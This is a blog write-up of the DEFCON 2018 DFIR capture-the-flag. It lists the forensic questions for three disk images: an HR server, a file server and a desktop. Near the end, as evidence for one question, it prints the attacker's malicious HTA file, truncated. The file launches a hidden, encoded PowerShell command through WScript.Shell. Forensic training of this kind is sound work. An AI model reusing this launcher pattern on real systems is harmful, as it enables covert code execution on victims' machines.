DEFCON DFIR CTF 2018 — Lessons Learned

Primer + Proof of Completion:

Low Effort MS Paint skillz. Yep I’m hightail

Introduction

Daily Blog #451: Defcon DFIR CTF 2018 Open to the Public

Hello Reader,
This year at Defcon we made things interesting with a challenge that involves making your way through 3 images to answer questions and solve a case. Now that Defcon is over and the winners awarded it’s your turn to give the challenge a try.

The first image password is ‘tacoproblems’
The second and third image password is gained by answering the right questions in the CTF.


CTF Site:
https://defcon2018.ctfd.io/

Download Links:
Image 1:
https://www.dropbox.com/s/1q4f0fowo8048mq/Image1.7z?dl=0

Image 2:
https://www.dropbox.com/s/9gzjfqkl8uup58k/Image2.7z?dl=0

Image 3:
https://www.dropbox.com/s/jvaqb4rfi3jojbk/Image3.7z?dl=0

HR Server (Image 1)

Basic

Which software was used to image the HR Server?

Which version of the software was used to image the HR Server? [Format: n.n]

What is the file name that represents MFT Entry 168043?

What is the MFT Entry number of the following file? \xampp\mysql\bin\mysql.exe

What is the MFT Attribute ID of the named $J data attribute for the MFT Entry with a file name of $UsnJrnl? [format is an integer]

At 2018–08–08 18:10:38.554 (UTC) what was the IP address of the the client that attempted to access SMB via an anonymous logon?

What was the name of the batch file saved by mpowers? [answer is fullpath starting with c:*****]

What is the name of the hr management application that hosts a web server?

What was the public url for the HR system’s portal? [format: http://*****]

What is name of the file that had a change recorded with an update sequence number of 368701440?

What is the name of the deleted file with a reference number of 12947848928752043?

$UsnJrnl:$J Results
$Logfile results

Advanced

At 2018–07–30 22:31:33 UTC which user was logged in under, what was the logon type (integer), and the logon process name? [format: {TargetUserName} — {LogonType} — {LogonProcessName} — {IpAddress}]

Bingo

At 2018–07–27 02:42:43 (UTC), what is the name of the task that was started?

Which IP address was accessing the OrangeHRM portal via Chrome 68.0.3440.84?

What version of Apache was being used [format: n.n]

What is the integer representation for the reason code given a USN V2 record where the record’s reason flags have the following:USN_REASON_CLOSE | USN_REASON_DATA_EXTEND | USN_REASON_FILE_CREATE

Expert

What was the top communicating IP address with the web server?

How many requests were made to the web server where the requested url contained a wget command within in?

File Server

Basic

What is the volume serial number of the only partition on the File Server Disk Image?

What is the name of the examiner who made the Forensic Image?

ewfinfo
FTK

Who cleared the security event log?

What is the hostname of the computer?

When was the computer last shutdown? UTC Time In the format of Month/Day/Year Hour:Minute:Second in 24 hour timr 1/1/2018 14:01:01

What is the Current Build number of Windows on the File Server computer?

What was mpowers user id?

Which program did Max Powers last run through the GUI?

When did Max Powers last open projections.zip? UTC Time Day/Month/year Hour:Minute:Sec in 24 hour time 1/1/2018 15:20:11

How many clusters are on the partition?

Advanced

Where does the \VSS directory go?

When was the Volume Shadow Copy 1 created? Enter answer in UTC TIme in the following format 1/1/2018 13:11:11 Month/Day/Year 24 Hour Time

Where did Max Powers login from?

Get-WinEvent -FilterHashtable @{Path=”.\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx”; ID=21} | Where-Object -Property Message -match ‘mpowers’ | fl | more

What program was used to delete forensic artifacts?

What is the name of the zip file that contains the M4Projects directory?

What host was used to exfil the data?

What is the url where the data was exfiled to?

Jigsaw puzzle skillz ftw
SAM + SYSTEM?

What did the USN Journal get wiped with?

What service did the attacker use to access this system?

Expert

What program extracted Mnemosyne.sys?

What directory was wiped?

Who requested the data to be exfiled?

What is the email address of the person who uploaded the data to Dropbox?

Desktop

Basic

What was the IP address of the Desktop?

What is the SID of the Administrator account?

What is the timezone offset that the system is in? Example -1

Note: I’m still unsure if it was indeed a misconfiguration. If you have comments/suggestions or if you know why -4 was the answer, please let me know. :D

What is the name of the deleted volume shadow copy directory in the recycle bin?

What is the name of the directory the attacker copied the files from the VSS to?

SAM + SYSTEM?

What is the name of the file the attacker exfiled?

What is the ip of the Magnetic Forensics website that the attacker access?

What was the administrator’s password?

Advanced

How did the attacker access the system?

When did the attacker login to the box for the first time? UTC Time Date Format Month/Day/Year 24 Hour Time 1/1/2018 22:00:00

What account did the attacker login via rdp?

When did the account you just identified last have the password changed? UTC Time Format Year-Month-Day 24 Hour Time 2018–01–01 14:01:01

What gave the attacker access to Max Power’s other accounts?

What is the name of the file that stored the data you identified in the prior question?

What is the password to the file you identified that allowed the attacker to get access to the other systems?

What is max powers password on the File Server? This answer is case sensitive

What was the IP address of the acquisition computer?

Expert

What is the IP and port that hosted malicious code that was used in the initial attack? [format: IP:PORT]

$ cat out.hta
<html><head><script>var c= 'powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBFAFIAcwBJAE8AbgBUAGEAQgBsAEUALgBQAFMAVgBFAFIAcw
...JABEAGEAdABhAC4AbABlAG4AZwBUAEgAXQA7AC0AagBPAEkATgBbAEMASABhAHIAWwBdAF0AKAAmACAAJABSACAAJABkAEEAdABBACAAKAAkAEkAVgArACQASwApACkAfABJAEUAWAA='
new ActiveXObject('WScript.Shell').Run(c);</script></head><body><script>self.close();</script></body></html>

What was the name of the file executed by the attacker from the ip identified prior?

What is that program actually?

Final Thoughts

--

--

Internet noob.

Love podcasts or audiobooks? Learn on the go with our new app.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store